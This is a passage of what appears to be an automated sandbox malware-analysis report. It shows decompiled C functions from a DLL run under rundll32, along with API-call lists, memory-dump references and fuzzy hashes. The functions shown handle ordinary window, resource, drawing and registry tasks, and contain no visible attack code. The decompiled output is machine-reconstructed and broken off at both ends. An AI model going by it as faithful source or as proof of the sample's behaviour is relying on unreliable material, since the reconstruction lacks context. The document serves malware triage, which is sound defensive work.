                                                                                                        						__eflags = _t20;
                                                                                                        						if(__eflags != 0) {
                                                                                                        							_push(_a16);
                                                                                                        							_push(_a12);
                                                                                                        							_push(_a8);
                                                                                                        							_push( *((intOrPtr*)(_t20 + 0x20)));
                                                                                                        							_push(_t20);
                                                                                                        							E1000ED9D(_t22, _t24, _t25, __eflags);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					__eflags = _a20;
                                                                                                        					if(_a20 != 0) {
                                                                                                        						_t18 = GetTopWindow(_t25);
                                                                                                        						__eflags = _t18;
                                                                                                        						if(_t18 != 0) {
                                                                                                        							E1000F078(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t16 = GetWindow(_t25, 2);
                                                                                                        				}
                                                                                                        				return _t16;
                                                                                                        			}














                                                                                                        APIs
                                                                                                        • GetTopWindow.USER32(?), ref: 1000F086
                                                                                                        • GetTopWindow.USER32(00000000), ref: 1000F0C5
                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 1000F0E3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window
                                                                                                        • String ID:
                                                                                                        • API String ID: 2353593579-0
                                                                                                        • Opcode ID: e08f19b7db489d1086e43c3b35a20f97fdb811987ef9703aa3a945a20e764dca
                                                                                                        • Instruction ID: de77be5b58460ce5d7dfb4ee9012cfaf8b93253514764d2a155b22be99aaeaf3
                                                                                                        • Opcode Fuzzy Hash: e08f19b7db489d1086e43c3b35a20f97fdb811987ef9703aa3a945a20e764dca
                                                                                                        • Instruction Fuzzy Hash: 3801E93600161ABBEF229F91CD05EEE3B66EF083D0F018019FE0461466C776D961EFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 96%
                                                                                                        			E1000E914(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				struct HWND__* _t9;
                                                                                                        				struct HWND__* _t10;
                                                                                                        				void* _t14;
                                                                                                        				void* _t15;
                                                                                                        				struct HWND__* _t16;
                                                                                                        				struct HWND__* _t17;
                                                                                                        				void* _t18;
                                                                                                        
                                                                                                        				_t14 = __ecx;
                                                                                                        				_t13 = __ebx;
                                                                                                        				_t9 = GetDlgItem(_a4, _a8);
                                                                                                        				_t15 = GetTopWindow;
                                                                                                        				_t16 = _t9;
                                                                                                        				if(_t16 == 0) {
                                                                                                        					L6:
                                                                                                        					_t10 = GetTopWindow(_a4);
                                                                                                        					while(1) {
                                                                                                        						_t17 = _t10;
                                                                                                        						__eflags = _t17;
                                                                                                        						if(_t17 == 0) {
                                                                                                        							goto L10;
                                                                                                        						}
                                                                                                        						_t10 = E1000E914(_t13, _t14, _t17, _a8, _a12);
                                                                                                        						__eflags = _t10;
                                                                                                        						if(_t10 == 0) {
                                                                                                        							_t10 = GetWindow(_t17, 2);
                                                                                                        							continue;
                                                                                                        						}
                                                                                                        						goto L10;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					if(GetTopWindow(_t16) == 0) {
                                                                                                        						L3:
                                                                                                        						_push(_t16);
                                                                                                        						if(_a12 == 0) {
                                                                                                        							return E1000E5E5(_t13, _t14, _t18);
                                                                                                        						}
                                                                                                        						_t10 = E1000E60C(_t14, _t15, _t16, __eflags);
                                                                                                        						__eflags = _t10;
                                                                                                        						if(_t10 == 0) {
                                                                                                        							goto L6;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_t10 = E1000E914(__ebx, _t14, _t16, _a8, _a12);
                                                                                                        						if(_t10 == 0) {
                                                                                                        							goto L3;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				L10:
                                                                                                        				return _t10;
                                                                                                        			}














                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32 ref: 1000E91F
                                                                                                        • GetTopWindow.USER32(00000000), ref: 1000E932
                                                                                                          • Part of subcall function 1000E914: GetWindow.USER32(00000000,00000002), ref: 1000E979
                                                                                                        • GetTopWindow.USER32(?), ref: 1000E962
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Item
                                                                                                        • String ID:
                                                                                                        • API String ID: 369458955-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 89%
                                                                                                        			E100453B3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				signed int _t15;
                                                                                                        				LONG* _t21;
                                                                                                        				long _t23;
                                                                                                        				void* _t31;
                                                                                                        				LONG* _t33;
                                                                                                        				void* _t34;
                                                                                                        				void* _t35;
                                                                                                        
                                                                                                        				_t35 = __eflags;
                                                                                                        				_t29 = __edx;
                                                                                                        				_t25 = __ebx;
                                                                                                        				_push(0xc);
                                                                                                        				_push(0x1006ce20);
                                                                                                        				E1003F350(__ebx, __edi, __esi);
                                                                                                        				_t31 = E10045AAA(__edx, __edi, _t35);
                                                                                                        				_t15 =  *0x10072f08; // 0xfffffffe
                                                                                                        				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                        					E1004091C(0xd);
                                                                                                        					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                        					_t33 =  *(_t31 + 0x68);
                                                                                                        					 *(_t34 - 0x1c) = _t33;
                                                                                                        					__eflags = _t33 -  *0x10072e10; // 0x3fb1300
                                                                                                        					if(__eflags != 0) {
                                                                                                        						__eflags = _t33;
                                                                                                        						if(_t33 != 0) {
                                                                                                        							_t23 = InterlockedDecrement(_t33);
                                                                                                        							__eflags = _t23;
                                                                                                        							if(_t23 == 0) {
                                                                                                        								__eflags = _t33 - 0x100729e8;
                                                                                                        								if(__eflags != 0) {
                                                                                                        									_push(_t33);
                                                                                                        									E10039F30(_t25, _t31, _t33, __eflags);
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_t21 =  *0x10072e10; // 0x3fb1300
                                                                                                        						 *(_t31 + 0x68) = _t21;
                                                                                                        						_t33 =  *0x10072e10; // 0x3fb1300
                                                                                                        						 *(_t34 - 0x1c) = _t33;
                                                                                                        						InterlockedIncrement(_t33);
                                                                                                        					}
                                                                                                        					 *(_t34 - 4) = 0xfffffffe;
                                                                                                        					E1004544E();
                                                                                                        				} else {
                                                                                                        					_t33 =  *(_t31 + 0x68);
                                                                                                        				}
                                                                                                        				if(_t33 == 0) {
                                                                                                        					E1003FD9B(_t25, _t29, _t31, 0x20);
                                                                                                        				}
                                                                                                        				return E1003F395(_t33);
                                                                                                        			}











                                                                                                        APIs
                                                                                                          • Part of subcall function 10045AAA: __getptd_noexit.LIBCMT ref: 10045AAB
                                                                                                          • Part of subcall function 10045AAA: __amsg_exit.LIBCMT ref: 10045AB8
                                                                                                        • __amsg_exit.LIBCMT ref: 100453DF
                                                                                                        • __lock.LIBCMT ref: 100453EF
                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 1004540C
                                                                                                        • InterlockedIncrement.KERNEL32(03FB1300), ref: 10045437
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                        • String ID:
                                                                                                        • API String ID: 2880340415-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1001B210(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                        				char _v16;
                                                                                                        				int _t12;
                                                                                                        				int _t16;
                                                                                                        				int _t18;
                                                                                                        				intOrPtr _t19;
                                                                                                        				void* _t24;
                                                                                                        				intOrPtr* _t27;
                                                                                                        
                                                                                                        				_t19 = _a4;
                                                                                                        				_t27 = __ecx;
                                                                                                        				E1002BA4B(__ecx, _t19, _a8);
                                                                                                        				_t12 = E10011632(__ecx);
                                                                                                        				if((_t12 & 0x00000100) != 0) {
                                                                                                        					_t12 = IsZoomed(GetParent( *(__ecx + 0x20)));
                                                                                                        					if(_t12 == 0) {
                                                                                                        						 *((intOrPtr*)( *_t27 + 0x110))(0x407, 0,  &_v16, _t24);
                                                                                                        						_t16 = GetSystemMetrics(5);
                                                                                                        						_t18 = GetSystemMetrics(2);
                                                                                                        						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - _t16 + _t16 - _v16 - _t18;
                                                                                                        						return _t18;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return _t12;
                                                                                                        			}











                                                                                                        APIs
                                                                                                          • Part of subcall function 10011632: GetWindowLongA.USER32 ref: 1001163D
                                                                                                        • GetParent.USER32(?), ref: 1001B236
                                                                                                        • IsZoomed.USER32(00000000), ref: 1001B23D
                                                                                                        • GetSystemMetrics.USER32 ref: 1001B265
                                                                                                        • GetSystemMetrics.USER32 ref: 1001B273
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MetricsSystem$LongParentWindowZoomed
                                                                                                        • String ID:
                                                                                                        • API String ID: 3909876373-0
                                                                                                        • Opcode ID: 2027483597c28d088b8d65f95d0945282e13d133a43ca733f2aa58fb268725be
                                                                                                        • Instruction ID: aa866a943e619855876455017d6ab89bfd20e9572458f37e961d8a25e54e31d7
                                                                                                        • Opcode Fuzzy Hash: 2027483597c28d088b8d65f95d0945282e13d133a43ca733f2aa58fb268725be
                                                                                                        • Instruction Fuzzy Hash: A8018676A00514ABDB10ABB4CC9AB8DB7B8EF44744F014125FF06EB191DA70AD45CBA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1000CB1E(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20) {
                                                                                                        				long _v12;
                                                                                                        				void _v16;
                                                                                                        				intOrPtr _t12;
                                                                                                        				long _t16;
                                                                                                        				void* _t21;
                                                                                                        				void* _t22;
                                                                                                        				void* _t23;
                                                                                                        
                                                                                                        				if(_a4 == 0 || _a16 == 0) {
                                                                                                        					L10:
                                                                                                        					return 0;
                                                                                                        				} else {
                                                                                                        					_t12 = _a12;
                                                                                                        					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E10029831(_t21, _t22, _t23, _a8, _t12) == 0) {
                                                                                                        						goto L10;
                                                                                                        					} else {
                                                                                                        						GetObjectA(_a16, 0xc,  &_v16);
                                                                                                        						SetBkColor(_a4, _v12);
                                                                                                        						_t16 = _a20;
                                                                                                        						if(_t16 == 0xffffffff) {
                                                                                                        							_t16 = GetSysColor(8);
                                                                                                        						}
                                                                                                        						SetTextColor(_a4, _t16);
                                                                                                        						return 1;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}











                                                                                                        APIs
                                                                                                        • GetObjectA.GDI32(00000000,0000000C,?), ref: 1000CB5C
                                                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 1000CB68
                                                                                                        • GetSysColor.USER32(00000008), ref: 1000CB78
                                                                                                        • SetTextColor.GDI32(00000000,?), ref: 1000CB82
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Color$ObjectText
                                                                                                        • String ID:
                                                                                                        • API String ID: 829078354-0
                                                                                                        • Opcode ID: 4cd7b4a95473d6a3777c221183f5ddf1fdffb6d416a574fda1b8added31c62fd
                                                                                                        • Instruction ID: 5b32d6ff7603df9b298d5f84671f4360422e4d9130b3f17c92165de6b0d46618
                                                                                                        • Opcode Fuzzy Hash: 4cd7b4a95473d6a3777c221183f5ddf1fdffb6d416a574fda1b8added31c62fd
                                                                                                        • Instruction Fuzzy Hash: A501E83450020EABFB419FB0DC46EAE3BA9EB056E5F504521FD12D51E4DB30CA95DB51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E100114FD(void* __ecx, CHAR* _a4) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				struct HRSRC__* _t8;
                                                                                                        				void* _t9;
                                                                                                        				void* _t11;
                                                                                                        				void* _t14;
                                                                                                        				void* _t15;
                                                                                                        				void* _t16;
                                                                                                        				struct HINSTANCE__* _t17;
                                                                                                        				void* _t18;
                                                                                                        
                                                                                                        				_t14 = 0;
                                                                                                        				_t11 = 0;
                                                                                                        				_t19 = _a4;
                                                                                                        				_t18 = __ecx;
                                                                                                        				if(_a4 == 0) {
                                                                                                        					L4:
                                                                                                        					_t16 = E100110B4(_t18, _t11);
                                                                                                        					if(_t11 != 0 && _t14 != 0) {
                                                                                                        						FreeResource(_t14);
                                                                                                        					}
                                                                                                        					return _t16;
                                                                                                        				}
                                                                                                        				_t17 =  *(E1000AB19(0, 0, _t15, _t19) + 0xc);
                                                                                                        				_t8 = FindResourceA(_t17, _a4, 0xf0);
                                                                                                        				if(_t8 == 0) {
                                                                                                        					goto L4;
                                                                                                        				}
                                                                                                        				_t9 = LoadResource(_t17, _t8);
                                                                                                        				_t14 = _t9;
                                                                                                        				if(_t14 != 0) {
                                                                                                        					_t11 = LockResource(_t14);
                                                                                                        					goto L4;
                                                                                                        				}
                                                                                                        				return _t9;
                                                                                                        			}
















                                                                                                        APIs
                                                                                                        • FindResourceA.KERNEL32(?,?,000000F0), ref: 1001151F
                                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,00000000,1003465F,?), ref: 1001152B
                                                                                                        • LockResource.KERNEL32(00000000,?,?,00000000,1003465F,?), ref: 10011538
                                                                                                        • FreeResource.KERNEL32(00000000,?,?,?,00000000,1003465F,?), ref: 10011553
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindFreeLoadLock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1078018258-0
                                                                                                        • Opcode ID: 03cd09b659b80faff1de25e05681a92764143ce5b8b6174939fe76576e1a5247
                                                                                                        • Instruction ID: 45d5f4f49bc87892eb4ff84dea624ac15e30c00a6e33766e90422a643f16de6d
                                                                                                        • Opcode Fuzzy Hash: 03cd09b659b80faff1de25e05681a92764143ce5b8b6174939fe76576e1a5247
                                                                                                        • Instruction Fuzzy Hash: 39F0963A2016119BE3455B664C94ABB76EEDFC59E17010039FE06D6211EF70CE818661
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E100340E0(void* __ecx) {
                                                                                                        				struct tagPOINT _v12;
                                                                                                        				struct tagPOINT _v20;
                                                                                                        				struct HDC__* _t19;
                                                                                                        
                                                                                                        				_t19 =  *(__ecx + 8);
                                                                                                        				if(_t19 != 0 &&  *(__ecx + 4) != 0) {
                                                                                                        					GetViewportOrgEx(_t19,  &_v12);
                                                                                                        					E10033FD4(__ecx,  &_v12);
                                                                                                        					_v12.y = _v12.y +  *((intOrPtr*)(__ecx + 0x24));
                                                                                                        					_v12.x = _v12.x +  *((intOrPtr*)(__ecx + 0x20));
                                                                                                        					SetViewportOrgEx( *(__ecx + 4), _v12, _v12.y, 0);
                                                                                                        					GetWindowOrgEx( *(__ecx + 8),  &_v20);
                                                                                                        					return SetWindowOrgEx( *(__ecx + 4), _v20, _v20.y, 0);
                                                                                                        				}
                                                                                                        				return _t19;
                                                                                                        			}







                                                                                                        APIs
                                                                                                        • GetViewportOrgEx.GDI32(?,?), ref: 100340FB
                                                                                                          • Part of subcall function 10033FD4: GetViewportExtEx.GDI32(?,?), ref: 10033FE5
                                                                                                          • Part of subcall function 10033FD4: GetWindowExtEx.GDI32(?,?), ref: 10033FF2
                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,00000000,00000000), ref: 10034123
                                                                                                        • GetWindowOrgEx.GDI32(?,?), ref: 10034130
                                                                                                        • SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 10034141
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ViewportWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1589084482-0
                                                                                                        • Opcode ID: 393dc1948b58fbdfbc244cdaf01051b87a4f7b7fc52a5ccd11d3b7db22bd5d44
                                                                                                        • Instruction ID: aba7402065dd9221a6c6b3e80884bfa66aff1a274eca49551bd942defb7da472
                                                                                                        • Opcode Fuzzy Hash: 393dc1948b58fbdfbc244cdaf01051b87a4f7b7fc52a5ccd11d3b7db22bd5d44
                                                                                                        • Instruction Fuzzy Hash: 30012835900A19EFDF51DBA4CD49AAEBBB9FF08701F004459F65AA21A0DB31AA54DB04
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 73%
                                                                                                        			E1000A2E2(intOrPtr __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
                                                                                                        				intOrPtr _v8;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				void* _t9;
                                                                                                        				void* _t14;
                                                                                                        				void* _t18;
                                                                                                        				void* _t19;
                                                                                                        				void* _t20;
                                                                                                        				void* _t22;
                                                                                                        				struct HINSTANCE__* _t23;
                                                                                                        
                                                                                                        				_t18 = __edx;
                                                                                                        				_push(__ecx);
                                                                                                        				_push(_t22);
                                                                                                        				_push(_t19);
                                                                                                        				_v8 = __ecx;
                                                                                                        				_t14 = 0;
                                                                                                        				_t23 =  *(E1000AB19(0, _t19, _t22, __eflags) + 0xc);
                                                                                                        				_t20 = LoadResource(_t23, FindResourceA(_t23, _a4, 5));
                                                                                                        				_t27 = _t20;
                                                                                                        				if(_t20 != 0) {
                                                                                                        					_t14 = LockResource(_t20);
                                                                                                        				}
                                                                                                        				_t9 = E10009F04(_t14, _v8, _t18, _t20, _t23, _t27, _t14, _a8, _t23);
                                                                                                        				FreeResource(_t20);
                                                                                                        				return _t9;
                                                                                                        			}

                                                                                                        APIs
                                                                                                        • FindResourceA.KERNEL32(?,?,00000005), ref: 1000A2FC
                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 1000A304
                                                                                                        • LockResource.KERNEL32(00000000), ref: 1000A311
                                                                                                        • FreeResource.KERNEL32(00000000,00000000,?,?), ref: 1000A329
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindFreeLoadLock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1078018258-0
                                                                                                        • Opcode ID: 6c28bb865aa75301f55e450648fd08d96b848b4bdd28b867a78cb9bb9c0b0679
                                                                                                        • Instruction ID: 0b1793e2512492727e0167c7af0db8d28abca8eecf98f20b54e3c25749b19aa1
                                                                                                        • Opcode Fuzzy Hash: 6c28bb865aa75301f55e450648fd08d96b848b4bdd28b867a78cb9bb9c0b0679
                                                                                                        • Instruction Fuzzy Hash: 44F08936200124BBD7019BE58C99C9FBBADDF45AA17004016FA05E3221D6749F0187A0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10038627(void* __ebx, void* __ecx, void* __eflags) {
                                                                                                        				signed int _t8;
                                                                                                        				int _t9;
                                                                                                        				void* _t12;
                                                                                                        				void* _t13;
                                                                                                        				signed int* _t14;
                                                                                                        				void* _t15;
                                                                                                        
                                                                                                        				_t11 = __ecx;
                                                                                                        				_t13 = __ecx;
                                                                                                        				E100382A4(__ecx, __eflags, 1);
                                                                                                        				ReleaseCapture();
                                                                                                        				_t12 = E1000E5E5(__ebx, _t11, _t15, GetDesktopWindow());
                                                                                                        				LockWindowUpdate(0);
                                                                                                        				_t14 = _t13 + 0x84;
                                                                                                        				_t8 =  *_t14;
                                                                                                        				if(_t8 != 0) {
                                                                                                        					_t9 = ReleaseDC( *(_t12 + 0x20),  *(_t8 + 4));
                                                                                                        					 *_t14 =  *_t14 & 0x00000000;
                                                                                                        					return _t9;
                                                                                                        				}
                                                                                                        				return _t8;
                                                                                                        			}

                                                                                                        APIs
                                                                                                          • Part of subcall function 100382A4: GetStockObject.GDI32(00000000), ref: 100382BA
                                                                                                          • Part of subcall function 100382A4: InflateRect.USER32(?,000000FF,000000FF), ref: 10038353
                                                                                                        • ReleaseCapture.USER32(?,?,1003867A), ref: 10038632
                                                                                                        • GetDesktopWindow.USER32 ref: 10038638
                                                                                                        • LockWindowUpdate.USER32(00000000,00000000,?,?,1003867A), ref: 10038648
                                                                                                        • ReleaseDC.USER32 ref: 10038660
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                                                                                                        • String ID:
                                                                                                        • API String ID: 1260764132-0
                                                                                                        • Opcode ID: 7a977cbea9fc7062b956c3a973d3cb9a4b2984effc7b4510d3562150bf8c0a79
                                                                                                        • Instruction ID: e8eba8b103eb90bb4d36ffdf5556b119ed21fd8c8fbd72528949c33104be400f
                                                                                                        • Opcode Fuzzy Hash: 7a977cbea9fc7062b956c3a973d3cb9a4b2984effc7b4510d3562150bf8c0a79
                                                                                                        • Instruction Fuzzy Hash: B5E0DF325002229FE7215F30DC0DB063AA4FF40316F150424FD44EA060EB36DA00CB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 96%
                                                                                                        			E10035347(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				void* _t25;
                                                                                                        				intOrPtr* _t28;
                                                                                                        				intOrPtr _t31;
                                                                                                        				void* _t50;
                                                                                                        				intOrPtr* _t52;
                                                                                                        				void* _t55;
                                                                                                        
                                                                                                        				_t50 = __edx;
                                                                                                        				_push(0x10);
                                                                                                        				E1003EE82(0x1005623c, __ebx, __edi, __esi);
                                                                                                        				E10001DB0(_t55 - 0x10, E10007F7E());
                                                                                                        				 *((intOrPtr*)(_t55 - 4)) = 0;
                                                                                                        				_t25 = E10007F7E();
                                                                                                        				_t44 = _t55 - 0x1c;
                                                                                                        				E10001DB0(_t55 - 0x1c, _t25);
                                                                                                        				 *(_t55 - 0x14) = 0;
                                                                                                        				if( *((intOrPtr*)(_t55 + 0x14)) == 0x80000000) {
                                                                                                        					RegOpenKeyExA(0x80000000, "CLSID", 0, 0x20019, _t55 - 0x14);
                                                                                                        				}
                                                                                                        				 *(_t55 - 0x18) =  *(_t55 - 0x14);
                                                                                                        				_t52 =  *((intOrPtr*)(_t55 + 8));
                                                                                                        				 *((char*)(_t55 - 4)) = 2;
                                                                                                        				while(1) {
                                                                                                        					_t28 =  *_t52;
